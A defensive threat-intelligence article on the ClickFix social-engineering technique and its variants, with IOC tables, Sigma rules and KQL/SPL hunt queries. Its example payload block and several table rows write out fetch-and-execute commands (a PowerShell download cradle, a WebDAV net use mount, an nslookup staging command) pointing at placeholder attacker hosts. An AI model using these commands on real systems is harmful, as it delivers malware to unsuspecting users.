ClickFix is not a single piece of malware. It is a delivery mechanism — a social engineering technique that hijacks the human impulse to follow on-screen instructions, weaponizes the Windows clipboard, and deposits malicious payloads without touching a file on disk until the victim does it themselves. Since its first documented observation in March 2024, it has been adopted by ransomware operators, state-sponsored groups from North Korea, Iran, and Russia, and commodity crimeware actors at scale. By mid-2025, it accounted for 47% of observed initial access methods according to Microsoft's 2025 Digital Defense Report — and ESET recorded a 517% surge in detections from late 2024 to mid-2025. This article compiles the concrete indicators of compromise defenders need to detect, hunt, and block it — including the variants that postdate most published guidance.
The term "ClickFix" first gained traction in security research around late 2023 and accelerated into mainstream threat intelligence reporting through 2024 and into 2026. Proofpoint researchers formally documented the technique in May 2024, describing it as a social engineering tactic that presents users with a fake error or CAPTCHA prompt and then instructs them to copy a PowerShell command — pre-loaded into the clipboard by malicious JavaScript — and paste it into a Run dialog or terminal. The name derives from the lure framing: the victim is told they need to "fix" something by clicking and following steps. Threat actors immediately recognized the value: by late 2024, ClickFix builders were being sold on dark web forums, allowing operators with no development skill to generate ready-made weaponized landing pages.
What makes ClickFix particularly corrosive to traditional defenses is that no file is written by the attacker. The attacker writes JavaScript into a webpage. The webpage writes a command into the Windows clipboard. The user types Win+R, pastes the command, and hits Enter. At that moment, the user — not the attacker — has executed the payload. Many endpoint detection and response platforms that watch for suspicious process creation from browser processes will miss this entirely, because the parent process is explorer.exe or cmd.exe, exactly as legitimate administrative activity looks. As Unit 42 researchers note, the technique abuses "procedural trust" — the victim follows instructions that resemble familiar IT troubleshooting steps, which is precisely why automation alone cannot stop it.
How ClickFix Works
The kill chain is compact and consistent across observed campaigns. A user lands on a compromised or attacker-controlled web page. The page renders a modal overlay — often styled to mimic Microsoft, Google Chrome, Cloudflare, DocuSign, or a document-sharing service — declaring that an error has occurred, that a browser extension is missing, that a CAPTCHA must be completed, or that a document cannot display without a "font fix." The modal instructs the user to press Win+R to open the Windows Run dialog, then to press Ctrl+V to paste, and then to hit Enter.
The JavaScript executing in the background has already written a PowerShell one-liner to the clipboard. When the user pastes and executes it, the command typically reaches out to an attacker-controlled domain to download a second-stage payload. In some variants, the full payload is Base64-encoded and embedded directly in the clipboard string, eliminating the need for a secondary network request at execution time. A refinement observed in 2025 embeds long blank space before the malicious command in the clipboard string — so the visible portion of the pasted text looks harmless, hiding the actual payload from casual inspection.
ClickFix bypasses many email security gateways and file-based sandbox tools because the initial delivery is a URL or a compromised page — not an attachment. The malicious "file" is the command already in your clipboard. Detection must happen at the process execution layer — specifically in EDR telemetry watching for process creation events — not at the file-delivery layer.
Observed clipboard payloads follow a small set of structural patterns. The classic form is a PowerShell.exe invocation with -ExecutionPolicy Bypass, -WindowStyle Hidden, and -EncodedCommand or an IEX (Invoke-Expression) calling a remote URL. Some campaigns use mshta.exe instead of PowerShell, particularly when lures are staged on pages imitating Windows Update or Office activation prompts. A minority of observed variants use wscript.exe or cscript.exe to execute a VBScript payload. A newer DNS-based staging variant — disclosed by Microsoft Threat Intelligence in February 2026 — routes the initial command through cmd.exe and performs a DNS lookup against a hard-coded external DNS server. The DNS response itself carries the second-stage payload, using DNS as a signaling channel rather than a web request, which helps the activity blend into normal network traffic.
# Representative ClickFix clipboard payload structures (sanitized)
# Classic PowerShell encoded form
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -NoProfile -EncodedCommand [Base64_blob]
# IEX download cradle form
powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('hxxps://[C2_domain]/[path]')"
# mshta variant — observed in Lumma Stealer and AsyncRAT campaigns
mshta "javascript:a=new ActiveXObject('WScript.Shell');a.Run('powershell ...',0);close()"
# WebDAV net use variant — new March 2026, evades PowerShell-focused EDR rules
"cmd.exe" /c net use Z: https://[attacker_IP]/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete
# DNS-based staging variant — February 2026
cmd.exe /c nslookup -type=TXT [attacker_domain] [hardcoded_DNS_server] | findstr "Name:" | [execution_logic]
ClickFix Variants: FileFix, CrashFix, TerminalFix, WebDAV, JackFix, ConsentFix, and GlitchFix
By mid-2025 the original ClickFix pattern had spawned a family of variants sharing the same core mechanic — clipboard poisoning and social engineering — but differing in how they instruct the victim to execute the payload, where execution happens, and what evidence they leave behind. Defenders who built detections only around the explorer.exe → powershell.exe parent-child chain will miss several of these. Some variants leave no endpoint footprint at all.
The original form. A fake error or CAPTCHA modal writes a PowerShell command to the Windows clipboard via JavaScript. The user presses Win+R, Ctrl+V, Enter. Every command run through Win+R is written to the RunMRU registry key, providing a reliable forensic artifact even if the process chain is missed by EDR. The classic variant is the most-documented and has the most mature detection coverage.
Introduced by researcher mr.d0x. A webpage uses an HTML file-input element to open Windows File Explorer, and silently loads a malicious command into the clipboard. The victim pastes into the Explorer address bar instead of the Run dialog — executing through the browser process rather than explorer.exe. Criminal groups were testing FileFix in live campaigns less than two weeks after its public disclosure. The registry artifact is TypedPaths, not RunMRU — detections built only on RunMRU monitoring will not catch it.
A malicious browser extension intentionally crashes the victim's browser, then displays a fake recovery prompt. The extension abuses finger.exe — a decades-old, still-present Windows utility — to retrieve a large obfuscated PowerShell blob without writing to disk. On domain-joined systems the chain escalates further, deploying a portable WinPython environment and ModeloRAT via registry Run keys and scheduled tasks. Documented by Microsoft and Trend Micro in campaigns attributed to KongTuke.
Directs victims to open PowerShell or Windows Terminal directly via Win+X on Windows 11 rather than Win+R. Campaigns distributing Havoc C2 used this variant in March 2025. Because the user launches PowerShell manually, the parent process is the terminal host itself — not explorer.exe — bypassing detections anchored to that parent relationship. Leaves no RunMRU artifact. Microsoft confirmed in March 2026 that attackers are using Win+X specifically to sidestep user training focused on the Run dialog.
Replaces PowerShell with net use — a native Windows networking command — to mount a remote WebDAV share and execute a batch file from it. The drive mapping is removed immediately after execution, leaving minimal forensic evidence. In the observed March 2026 campaign this bypassed Microsoft Defender for Endpoint and was only caught by targeted threat hunting on RunMRU artifacts. Final payload was ModeloRAT delivered via a trojanized WorkFlowy application.
Takes the psychological pressure considerably further. Victims are lured via malvertising to fake adult sites; on interaction, the page goes full-screen and displays a fake Windows screen-lock overlay demanding identity verification to regain access. The Run dialog is surfaced inside the fake lock screen, and victims paste and execute under the belief they are unlocking their computer. Engineered to overwhelm hesitation by creating urgency and panic — the psychological conditions in which people stop questioning instructions. Detection surface is identical to classic ClickFix.
Architecturally distinct from every other variant. No command executes on the endpoint. No process is spawned. No registry key is written. The attack exploits the OAuth 2.0 authorization code flow — the victim is tricked into pasting a localhost URL containing an Azure CLI OAuth authorization code into an attacker-controlled site. Because Azure CLI is a native Microsoft application, third-party OAuth mitigations do not apply. The attacker captures the code, exchanges it for a token, and gains persistent Microsoft account access without phishing a password or triggering MFA. Detection must happen at the identity layer.
Delivered through the ErrTraffic traffic distribution system, which injects JavaScript into compromised websites causing visible page glitches, then prompts users to run a command to restore rendering. Sold as a service — operators with no development capability can purchase access and customize lure type per visitor segment. Some observed chains abuse SyncAppvPublishingServer.vbs — a signed Microsoft App-V script — as a proxy execution layer to avoid direct PowerShell invocation. Delivered Lumma Stealer and Amatera Stealer through early 2026.
ClickFix was historically a Windows-focused technique, but 2025 brought confirmed campaigns targeting macOS, and 2026 has brought increasing sophistication to those campaigns. Sophos X-Ops and CloudSEK documented macOS campaigns delivering Atomic macOS Stealer (AMOS) via fake Cloudflare verification and fake GitHub installation interfaces. These campaigns instruct macOS users to open Terminal and paste a shell command rather than using Win+R. The technique bypasses Gatekeeper and XProtect because the user — not an unsigned binary — initiates execution. Sophos researchers found that one campaign's tracking infrastructure reported real-time victim click counts to an attacker-controlled Telegram bot, with comments in Russian in the malicious script source.
A more recent macOS variant, dubbed Matryoshka, escalates the evasion further. Documented in February 2026, it begins with typosquatting — attackers register domains that closely mimic legitimate sites — and the delivered shell script operates entirely in memory, fetching a rogue shell script from an external server that then decodes and executes additional stages without writing to disk. The infection chain uses API-gated communications, meaning the C2 only responds to traffic that meets specific criteria, complicating automated sandbox analysis. The final payload exfiltrates credentials from 203 browser wallet extensions and 18 desktop cryptocurrency wallet applications. The macOS threat surface for ClickFix is no longer limited to a single stealer family delivered through a single lure type — and "Macs don't get viruses" is no longer an acceptable security posture for any organization with macOS endpoints.
Threat Actors Using ClickFix
By mid-2024, ClickFix had transitioned from a niche technique to what Proofpoint described as "a very popular social engineering technique used by multiple threat actors." The adoption curve has been steep and the actor list has grown to span criminal, espionage, and ransomware operators across at least four nation-state alignments.
ClickFix is not reinventing nation-state campaigns — it is slotting into the installation and execution stages of chains that already existed. That makes the execution layer the only detection chokepoint that holds across every actor using it.
Based on Proofpoint Threat Research, April 2025Proofpoint documented TA571 and ClearFake delivering AsyncRAT, DarkGate, Matanbuchus, NetSupport RAT, and Lumma Stealer via ClickFix as early as May 2024. ClearFake infrastructure remained active as of early 2026, with Trend Micro's March 2026 KongTuke investigation identifying the same WordPress injection pattern. The ClearFake cluster represents the democratization phase — commodity access sold via builders on dark web forums by late 2024.
The Kimsuky infection chain executed PowerShell, VBScript, and batch scripts in sequence, delivering QuasarRAT while displaying a decoy PDF to avoid suspicion. All infrastructure was newly registered as of January 2025 and largely hosted on compromised South Korean systems using dynamic DNS. A VBScript scheduled task set to run at 19-minute intervals is a high-fidelity Kimsuky-specific IOC confirmed by Proofpoint's April 2025 "Around the World in 90 Days" report.
Targets who followed ClickFix instructions executed a PowerShell script with administrator privileges that installed Level, a legitimate remote monitoring and management tool subsequently used for persistent access and surveillance. The attacker sending domain was support@microsoftonlines[.]com. The timing against Patch Tuesday demonstrates operational awareness of when targets are most likely to accept security-themed prompts as legitimate.
Separate Russian-affiliated group UNK_RemoteRogue ran a December 2024 campaign against defense-sector targets, exploiting compromised Zimbra mail servers. Lures mimicked a Microsoft Word page and included a fake YouTube tutorial for credibility, with the executed PowerShell payload establishing communication with an Empire C2 server. Russia-linked COLDRIVER used ClickFix to deploy BAITSWITCH and SIMPLEFIX against dissidents and civil society, with observed cleanup including RunMRU registry key deletion to remove forensic evidence — mapped to T1070.003.
LeakNet's chain involves jli.dll side-loading into Java, PsExec-based lateral movement, and S3 bucket payload staging. Their Deno-based loader executes Base64-encoded JavaScript almost entirely in memory — Deno is treated as safe developer tooling by file-based controls. VBScript and PowerShell scripts named Romeo*.ps1 and Juliet*.vbs install the legitimate Deno runtime and use it to run malicious code. EtherHiding encodes next-stage payload retrieval in Binance BNB Smart Chain smart contracts, making domain-based blocking useless at the C2 layer.
In May 2025, law enforcement seized over 2,300 Lumma Stealer domains in a coordinated disruption. ClickFix was also the primary delivery vector for Latrodectus, MintsLoader, NetSupport RAT, AsyncRAT, and the banking-focused Lampion infostealer. A June 2025 campaign impersonated the US Social Security Administration to deliver ScreenConnect. CIS reported ClickFix comprised over a third of all non-malware Albert Network Monitoring alerts in H1 2025, including Interlock ransomware delivery against a SLTT government target.
IOC Categories and Examples
The reliable ClickFix indicators do not change when infrastructure rotates. Build detections on behavioral patterns, not domain block lists.
Consistent finding across Proofpoint, Unit 42, Huntress, and Microsoft Threat Intelligence researchIndicators of compromise for ClickFix fall into several distinct categories. Because infrastructure rotates rapidly, network-based IOCs have a shorter useful life than behavioral IOCs. The highest-fidelity detection comes from process and command-line telemetry and registry artifacts, not from domain block lists.
Behavioral IOCs (Highest Fidelity)
The reliable ClickFix indicators are behavioral patterns at the process execution layer. These do not change when infrastructure rotates, and they persist across variants.
| Indicator | Type | Notes |
|---|---|---|
| explorer.exe → powershell.exe with -EncodedCommand | Process | PowerShell launched from explorer.exe (Win+R Run dialog) with encoded payload — primary ClickFix execution signature |
| explorer.exe → mshta.exe with javascript: URI | Process | mshta used as a PowerShell bypass; seen in Lumma and AsyncRAT campaigns |
| -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive | Cmdline | Consistent flag combination across ClickFix campaigns; rarely seen in legitimate admin use launched from Run dialog |
| IEX(New-Object Net.WebClient).DownloadString( | Cmdline | Classic download cradle; ClickFix frequently uses this or DownloadFile variant in the clipboard command |
| cmd.exe /c net use [letter]: https://[IP]/webdav | Cmdline | WebDAV net use variant — new as of March 2026; bypassed Defender for Endpoint in observed campaign. Followed immediately by batch file execution and drive deletion. |
| cmd.exe /c powershell [hidden flags] launched from explorer.exe | Process | Some variants wrap PowerShell in a cmd shell to add one layer of obfuscation |
| wscript.exe or cscript.exe with .vbs from %TEMP% or %APPDATA% | Process | VBScript variant; less common but observed in campaigns impersonating Office activation |
| finger.exe invoked with an external IP or domain argument | Process | CrashFix variant; finger.exe retrieves obfuscated PowerShell payload from attacker server without a standard HTTP request |
| Clipboard content containing powershell and -enc or -EncodedCommand at browser session time | Clipboard | Some EDR solutions can inspect clipboard contents; a PowerShell encoded command in clipboard during active browsing is a strong signal |
| nslookup with hardcoded non-system DNS server, output piped through findstr for execution | Cmdline | DNS-based staging variant identified by Microsoft in February 2026; uses DNS TXT records to deliver the second-stage payload |
| wt.exe (Windows Terminal) spawning powershell.exe with encoded or hex-encoded arguments | Process | TerminalFix / Win+X variant; bypasses detections anchored to explorer.exe as parent. No RunMRU artifact is written. Alert on wt.exe as parent for suspicious PowerShell activity. |
| SyncAppvPublishingServer.vbs executing PowerShell with encoded payload | Process | GlitchFix / Amatera Stealer campaigns (2026); abuses a signed Microsoft App-V script as a LOLBin proxy to conceal direct PowerShell invocation from standard detection rules |
Registry Forensic IOCs — RunMRU and TypedPaths
A critical and underutilized detection surface for ClickFix is the Windows Run dialog history registry key. Every command executed through Win+R is written to HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. Hunting this key for PowerShell invocations, net use commands pointing to external IPs, or mshta with javascript: URIs provides a reliable forensic trail. Defenders should also alert on deletion of this key — mapped to T1070.003 — since COLDRIVER and other actors have been observed wiping it post-execution to cover their tracks.
For FileFix, the equivalent artifact is HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths, which records what the user typed into File Explorer's address bar. A PowerShell or web request command appearing in TypedPaths is highly anomalous and a strong indicator of FileFix execution.
| Registry Key | Variant | Hunting Guidance |
|---|---|---|
| HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU | ClickFix | Alert on entries containing: powershell, mshta, cmd, net use with external IPs, or any value with http:// or https:// strings |
| HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths | FileFix | Alert on entries that are not filesystem paths — any PowerShell syntax or URL is anomalous in this key |
| reg.exe delete targeting RunMRU (T1070.003) | Cleanup | Deletion of RunMRU is a strong post-execution indicator; rarely done by legitimate processes. Attributed to COLDRIVER and other APT actors. |
Network IOCs (Moderate Fidelity, Rotate Frequently)
Specific domains and IPs from ClickFix campaigns have limited shelf lives — infrastructure is typically stood up for a campaign and abandoned within days to weeks. The following patterns are drawn from published threat research; defenders should treat domain and IP IOCs as ephemeral and prioritize detection logic over block lists.
ClickFix C2 domains frequently use newly registered domains (under 30 days old), abuse free hosting services such as GitHub Pages or Cloudflare Pages for the initial lure stage, and use Cloudflare as a proxy layer, making IP-based blocking largely ineffective for the lure delivery tier. LeakNet specifically shifted to delivery via compromised legitimate websites rather than attacker-owned infrastructure specifically to avoid new-domain detection signals. The payload-download tier shows more stable patterns in URL path structure, and the WebDAV and DNS variants add further layers that avoid standard HTTP-based detection.
URL path patterns observed across ClickFix campaigns include short alphanumeric paths under /d/, /dl/, /s/, or /get/ prefixes, often serving PowerShell scripts with .ps1 extensions or extensionless responses with text/plain content type. Some campaigns used GitHub raw content URLs (raw.githubusercontent.com) to host the second-stage script, a technique that complicates domain-based blocking. A Rapid7-documented campaign active since December 2025 weaponized over 250 compromised WordPress sites across 12 countries as lure delivery infrastructure, including a U.S. Senate candidate's official webpage.
| Pattern / Example | Type | Campaign Association |
|---|---|---|
| hxxps://raw.githubusercontent[.]com/[user]/[repo]/main/[script].ps1 | URL | Lumma Stealer, AsyncRAT campaigns; GitHub as anonymous hosting |
| Newly registered .top, .xyz, .online, .site TLDs with captcha- or verify- prefixes | Domain Pattern | Broad ClickFix campaigns; fake CAPTCHA delivery |
| verify-human[.]pages[.]dev, check-browser[.]pages[.]dev (pattern) | Domain Pattern | Cloudflare Pages abuse for lure delivery; observed 2024 |
| Domains registered via Namecheap or Porkbun with privacy protection, age <14 days | Domain Attr | Consistent across multiple campaigns; useful for proactive blocking of new infrastructure |
| HTTP GET to /[4-8 char random string].ps1 returning text/plain with IEX content | URL Pattern | Second-stage download; high-confidence ClickFix payload delivery |
| AS202425 (IP Volume Inc.), AS9370 (Sakura Internet) hosting C2 | ASN | Commonly abused hosting ASNs in ClickFix infrastructure; useful for enrichment and risk scoring |
| mein-lonos-cloude[.]de (Storm-0426 campaign, March 2025) | Domain | Attacker-controlled site used in MintsLoader campaign targeting German users; delivered via Prometheus TDS |
| Outbound WebDAV connections (port 443/80) to residential or VPS IPs from cmd.exe or net.exe | Network | WebDAV net use variant; net use connections to external IPs are anomalous in most enterprise environments |
Registry and Persistence IOCs
When ClickFix delivers a stealer like Lumma, persistence is often not established — the goal is data exfiltration in a single session. When it delivers a RAT, loader, or ransomware precursor, persistence mechanisms follow predictable patterns.
| Indicator | Type | Associated Payload |
|---|---|---|
| HKCU\Software\Microsoft\Windows\CurrentVersion\Run — entries pointing to %APPDATA% executables | Registry | AsyncRAT, NetSupport RAT, ModeloRAT persistence |
| Scheduled task with name resembling system tasks (e.g., "MicrosoftUpdateHelper", "ChromeUpdater") | Scheduled Task | DarkGate, Matanbuchus, QuasarRAT (Kimsuky) persistence |
| Scheduled VBScript task set to run at 19-minute intervals | Scheduled Task | Kimsuky (TA427) ClickFix campaign — documented by Proofpoint, April 2025 |
| %APPDATA%\[random 8-char string]\[random].exe — new PE in Roaming with no digital signature | File | General ClickFix payload drop location |
| %TEMP%\[random].vbs or [random].js executed on first run, then deleted | File | Intermediate dropper; often cleaned up after payload execution |
| LNK file in Startup folder pointing to PowerShell | File | Observed in some NetSupport RAT deployments via ClickFix |
| Portable WinPython environment in non-standard path (e.g., %APPDATA%\WinPython) | File | CrashFix / KongTuke variant delivering ModeloRAT |
| jli.dll loaded into java.exe from USOShared directory | File | LeakNet post-exploitation chain — DLL side-loading as noted by ReliaQuest, 2026 |
Detection Rules and Hunt Queries
The following detection logic is based on patterns documented across Proofpoint, Huntress, Unit 42, Atos, Microsoft Threat Intelligence, and Trend Micro research. These are starting points for tuning, not production-ready rules — they will generate noise in environments with active PowerShell-based administration. Baseline your environment before deploying them broadly.
Sigma Rule: ClickFix PowerShell Execution from Run Dialog
title: ClickFix PowerShell Execution via Windows Run Dialog
id: [assign your own GUID]
status: experimental
description: >
Detects PowerShell launched from explorer.exe (Windows Run dialog)
with flags commonly used in ClickFix clipboard-injected commands.
author: NoHackie
references:
- https://www.proofpoint.com/us/blog/threat-insight/clipboard-hijacking-clickfix
- https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\explorer.exe'
Image|endswith: '\powershell.exe'
CommandLine|contains|all:
- '-ExecutionPolicy'
- 'Bypass'
- '-WindowStyle'
- 'Hidden'
condition: selection
falsepositives:
- Legitimate admin scripts launched manually via Run dialog
level: high
tags:
- attack.execution
- attack.t1059.001
- attack.t1204.002
Sigma Rule: mshta with JavaScript URI from Explorer
title: ClickFix mshta JavaScript URI Execution
id: [assign your own GUID]
status: experimental
description: >
Detects mshta.exe launched from explorer.exe with a javascript: URI,
consistent with ClickFix variants that avoid direct PowerShell invocation.
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\explorer.exe'
Image|endswith: '\mshta.exe'
CommandLine|contains: 'javascript:'
condition: selection
falsepositives:
- Rare; mshta with javascript URI from explorer has very limited legitimate use
level: high
tags:
- attack.execution
- attack.t1218.005
Sigma Rule: RunMRU Registry Contains Suspicious Command
title: ClickFix Execution Pattern via RunMRU Registry Write
id: [assign your own GUID]
status: experimental
description: >
Detects writes to the RunMRU registry key containing indicators of
ClickFix-style command execution — URLs, PowerShell, mshta, net use,
or cmd invocations that are anomalous in the Run dialog context.
Covers ClickFix and WebDAV net use variants.
references:
- https://detection.fyi/sigmahq/sigma/windows/registry/registry_set/registry_set_potential_clickfix_execution/
- https://atos.net/en/lp/cybershield
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains: '\Explorer\RunMRU'
Details|contains:
- 'powershell'
- 'mshta'
- 'http://'
- 'https://'
- 'net use'
- '-EncodedCommand'
- 'IEX'
condition: selection
falsepositives:
- Extremely rare; these strings have no legitimate use in Run dialog history
level: high
tags:
- attack.execution
- attack.t1204.002
Sigma Rule: RunMRU Registry Deletion (Post-Execution Cleanup)
title: RunMRU Registry Key Deletion — ClickFix Anti-Forensics
id: [assign your own GUID]
status: experimental
description: >
Detects deletion of the RunMRU registry key. Observed in COLDRIVER
campaigns and other ClickFix actors performing post-execution cleanup
to remove forensic evidence of Win+R command history.
references:
- https://detection.fyi/sigmahq/sigma/windows/process_creation/proc_creation_win_reg_delete_runmru/
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\reg.exe'
- OriginalFileName: 'reg.exe'
selection_cli:
CommandLine|contains|all:
- ' del'
- '\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
condition: all of selection_*
falsepositives:
- Unknown; this is a high-confidence indicator
level: high
tags:
- attack.defense-evasion
- attack.t1070.003
KQL Hunt Query (Microsoft Sentinel / Defender XDR)
// ClickFix: Multi-variant detection covering PowerShell, mshta, net use, and finger.exe
DeviceProcessEvents
| where InitiatingProcessFileName =~ "explorer.exe"
or (InitiatingProcessFileName =~ "cmd.exe" and ProcessCommandLine has "net use" and ProcessCommandLine has "https://")
| where FileName in~ ("powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe", "finger.exe", "cmd.exe")
| where ProcessCommandLine has_any (
"-ExecutionPolicy", "-EncodedCommand", "IEX(New-Object",
"DownloadString", "javascript:", "net use", "-w hidden"
)
| project Timestamp, DeviceName, AccountName, FileName,
ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Timestamp desc
// ClickFix: RunMRU registry artifact hunt
DeviceRegistryEvents
| where RegistryKey has "RunMRU"
| where RegistryValueData has_any (
"powershell", "mshta", "http://", "https://", "net use", "-EncodedCommand", "IEX"
)
| project Timestamp, DeviceName, AccountName, RegistryKey, RegistryValueName, RegistryValueData
| order by Timestamp desc
Splunk SPL Hunt Query
index=windows sourcetype=WinEventLog:Security OR sourcetype=sysmon
EventCode=4688 OR EventID=1
(ParentImage="*\\explorer.exe" OR (ParentImage="*\\cmd.exe" AND CommandLine="*net use*https*"))
(Image="*\\powershell.exe" OR Image="*\\mshta.exe" OR Image="*\\finger.exe" OR Image="*\\cmd.exe")
(CommandLine="*ExecutionPolicy*Bypass*" OR CommandLine="*EncodedCommand*"
OR CommandLine="*IEX*DownloadString*" OR CommandLine="*net use*webdav*"
OR CommandLine="*javascript:*")
| table _time, ComputerName, User, ParentImage, Image, CommandLine
| sort - _time
In environments where IT staff use PowerShell regularly, filter on the parent process more carefully. The key discriminator for classic ClickFix is the parent process being explorer.exe — not a terminal, IDE, or management console. For the Win+X / TerminalFix variant, look at PowerShell sessions with no associated terminal host parent that immediately initiate network connections. For the WebDAV variant, alert on any net use command referencing external IPs or HTTPS URIs. The RunMRU registry hunt is complementary and catches cases where the process chain detection misses due to EDR gaps — Atos researchers confirmed it was the only detection that caught the March 2026 WebDAV variant.
MITRE ATT&CK Mapping
ClickFix and its variants map across multiple MITRE ATT&CK techniques, which is part of what makes it effective — it is genuinely a multi-technique attack chain, not cleanly categorized into a single TTP. The variant landscape adds several mappings not present in 2024-era documentation, and ConsentFix introduces a technique — T1528 (Steal Application Access Token) — that requires identity-layer detection rather than endpoint telemetry.
| Technique ID | Technique Name | ClickFix Application |
|---|---|---|
| T1204.002 | User Execution: Malicious File | User pastes and executes the clipboard payload — execution requires user action and bypasses most automated defenses |
| T1204.001 | User Execution: Malicious Link | User clicks a link or lure button that triggers clipboard write; MITRE community now maps ClickFix here as the primary entry point |
| T1059.001 | Command and Scripting Interpreter: PowerShell | PowerShell is the primary interpreter used in clipboard payloads across all major campaigns |
| T1218.005 | System Binary Proxy Execution: Mshta | mshta.exe variant used to proxy execution and bypass PowerShell-specific detections |
| T1105 | Ingress Tool Transfer | PowerShell download cradle retrieves second-stage payload from attacker C2 |
| T1027 | Obfuscated Files or Information | Base64-encoded command blocks and ROT-cipher obfuscation hide payload content from casual inspection; blank-space padding hides payload from clipboard preview |
| T1566.002 | Phishing: Spearphishing Link | Initial delivery via malicious link in email or messaging platform leading to lure page |
| T1608.004 | Stage Capabilities: Drive-by Target | Attacker stages lure content on compromised or purpose-built websites |
| T1140 | Deobfuscate/Decode Files or Information | PowerShell decodes Base64 payload at runtime before execution |
| T1021.002 | Remote Services: SMB/Windows Admin Shares (via WebDAV) | WebDAV net use variant mounts a remote share to deliver and execute a batch file, then removes the mapping |
| T1071.004 | Application Layer Protocol: DNS | DNS-based staging variant uses DNS TXT lookups against attacker-controlled resolvers to deliver second-stage payload |
| T1070.003 | Indicator Removal: Clear Command History | Post-execution deletion of RunMRU registry key observed in COLDRIVER campaigns to remove forensic trace of Win+R execution |
| T1528 | Steal Application Access Token | ConsentFix variant; victim is tricked into pasting a localhost OAuth authorization code URL into an attacker-controlled page, granting the attacker persistent access to the victim's Microsoft account via Azure CLI without any password or MFA interaction |
| T1071.001 | Application Layer Protocol: Web Protocols (Blockchain C2) | EtherHiding technique observed in LeakNet and ClearFake-adjacent campaigns; next-stage payloads and C2 commands are retrieved via Binance BNB Smart Chain smart contracts, bypassing domain-based blocking and infrastructure takedowns |
The T1204.002 / T1204.001 (User Execution) mapping is the most significant from a defensive standpoint. Because the user performs the final execution step, many automated defenses do not trigger. The attack is specifically designed to make the user the last line of defense — and to convince that user that what they are doing is legitimate and helpful. Proofpoint's April 2025 analysis of state-sponsored ClickFix adoption concluded that the technique is not fundamentally changing those actors' campaigns — it is being inserted into the installation and execution stages of infection chains that already existed, which means that detection at the execution layer is the only reliable chokepoint regardless of which threat actor is operating it.
Key Takeaways
- Detect at execution, not at delivery: ClickFix bypasses email and file-based controls. Your detection must live in EDR telemetry — specifically in process creation events watching for PowerShell, mshta, cmd, or net use launched from explorer.exe with suspicious flag combinations. The RunMRU registry key is a complementary forensic surface that caught the March 2026 WebDAV variant when EDR missed it entirely.
- Behavioral IOCs outlast network IOCs: Specific C2 domains and IPs rotate too fast to be operationally useful as your primary detection mechanism. The command-line patterns —
-ExecutionPolicy Bypass,-WindowStyle Hidden, encoded commands, download cradles — and the RunMRU registry artifacts are consistent across campaigns and threat actors. Build detections on these patterns and hunt the registry, not just the process tree. - The variant list is growing and each variant has different forensic artifacts: Classic ClickFix leaves evidence in RunMRU and the explorer.exe process chain. FileFix leaves evidence in TypedPaths. TerminalFix leaves no RunMRU artifact at all. The WebDAV net use variant bypassed Defender for Endpoint in a confirmed 2026 incident. A single detection rule covering only the original pattern misses most of the current threat surface. Hunt across all three registry keys and all relevant parent process relationships.
- The actor list spans criminal and nation-state operators: ClickFix started as a commodity crimeware technique and was adopted by Kimsuky, MuddyWater, APT28, UNK_RemoteRogue, and COLDRIVER within roughly a year. Any organization that would be targeted by espionage actors, ransomware operators, or information stealers is a viable ClickFix target. The Microsoft 2025 Digital Defense Report's figure of 47% of initial accesses coming from ClickFix makes this a category-one detection priority.
- User awareness is a meaningful control — but the training needs to keep up with the variant list: Unlike many malware delivery techniques, ClickFix requires the user to actively follow multi-step instructions. Security awareness training that specifically addresses the "copy this command and paste it in Run" pattern can interrupt the chain where technical controls have gaps. But that training is now insufficient on its own. The Win+X shortcut to Windows Terminal bypasses awareness programs built entirely around Win+R — and Microsoft confirmed in March 2026 that attackers are using this variant specifically to sidestep user training that focuses on the Run dialog. ConsentFix bypasses endpoint-focused training entirely because there is no command to paste and no terminal to open — just a URL in a browser. Extend training to cover three distinct scenarios: (1) any website that prompts Win+R or Win+X and paste; (2) any prompt to open Terminal on macOS; (3) any site — including search results — that asks you to copy and paste a URL containing a login token or authorization code. Train users to treat Cloudflare's verification interface as the canonical phishing vector it has become. Extend that training to macOS users: the Matryoshka and AMOS variants deliver via the same psychological mechanism and now operate with fileless execution and API-gated C2.
- Restrict the Run dialog, PowerShell, and WebDAV where operationally feasible: Application control policies, AppLocker or Windows Defender Application Control rules, and PowerShell Constrained Language Mode all reduce the effectiveness of ClickFix. Where these cannot be applied broadly, consider Group Policy to disable the Win+R Run dialog for non-administrative users. For the WebDAV variant, consider blocking outbound WebDAV connections to external IPs at the network perimeter. Block newly registered domains (under 30 days old) as a layered control — this directly targets the infrastructure pattern common across commodity ClickFix campaigns.
ClickFix demonstrates that the effective attack techniques are often the simplest architecturally. There is no novel exploit here, no zero-day, no sophisticated persistence mechanism in the initial stage. It is a social engineering script that gets a human being to do the one thing that automated defenses are specifically not watching for: type a command themselves. The technique has now been adopted across criminal ecosystems and nation-state operations on three continents, expanded to macOS, evolved into at least four named variants, and is being actively sold as a builder product on dark web forums. Detection requires telemetry at the execution layer, hunting logic anchored to behavioral patterns rather than known-bad hashes, registry artifact analysis, and a workforce trained to recognize what the prompt looks like across all its forms.
- Proofpoint Threat Research (Miller, D. & Madjar, T.). "A Clipboard Hijacking Technique Delivers Multiple Malware Payloads." Proofpoint, May 2024. https://www.proofpoint.com/us/blog/threat-insight/clipboard-hijacking-delivers-multiple-malware-payloads
- Proofpoint Threat Research (Naumaan, S. et al.). "Around the World in 90 Days: State-Sponsored Actors Try ClickFix." Proofpoint, April 17, 2025. https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix
